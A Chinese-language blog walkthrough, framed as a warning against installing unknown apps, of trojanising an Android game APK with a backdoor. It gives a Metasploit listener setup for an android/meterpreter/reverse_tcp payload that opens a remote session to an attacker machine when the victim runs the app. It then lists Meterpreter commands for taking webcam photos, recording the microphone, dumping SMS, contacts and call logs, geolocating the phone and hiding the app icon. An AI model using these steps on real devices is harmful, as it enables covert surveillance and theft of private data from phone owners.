“记一次安卓渗透测试”
实验环境:
| ip | 操作系统 |
|---|---|
| 192.168.1.116 | linux |
向安卓软件.APK中注入后门
注意:此文章只分享部分步骤,仅用来警示部分朋友的无视风险安装
安卓客户端渗透目前来说已经是CTF中的一个非常重要的分类了,但是通常的它更多的是二进制层面的博弈,如果仅仅是在apk中注入后门可能非常简单,但通常需要的是一系列的攻击手段来辅助完成 的。所以这里仅做简单介绍,并不深入研究。
禁用ipv6
1
2
3
4
5
echo "net.ipv6.conf.eth0.disable_ipv6 = 1" >> /etc/sysctl.conf
sysctl -p
ifconfig

安装逆向工具

解压安装
上传游戏安装包,游戏名为 禁锢坦克

检查并安装依赖

进入逆向工具

开始对apk注入后门

生成一个密钥,编译apk程序所需。

生成带有后门的APK程序

手动启动侦听
1
2
3
4
5
6
msfdb run
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set lhost 192.168.1.53
set lport 4444
exploit
手机安装运行APP即可建立session

双击启动

成功建立连接
常用命令解释
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Stdapi: Webcam Commands
===================================
webcam_list 列出网络摄像头
record_mic [ˈrekərd]/记录/ 从默认麦克风录制音频为X秒
webcam_chat 开始视频聊天
webcam_snap 从指定的摄像头获取快照
webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头]
Android Commands
=================
activity_start 从 URI 字符串启动Android活动
check_root 检查设备是否有根
dump_calllog 获取调用日志
dump_contacts 获取联系人列表
dump_sms 获取短信
geolocate 利用地理定位获取当前LAT
wlan_geolocate 利用 WLAN信息获取当前LAT
hide_app_icon 从发射器隐藏应用程序图标
interval_collect 管理区间收集能力
send_sms 从目标会话发送短消息
set_audio_mode
sqlite_query 从存储库查询SQLite数据库
wakelock 启用/禁用Wakelock
废话不多说我们直接拍个照。

兄弟们 不要无视风险安装不明来源的软件了!!!!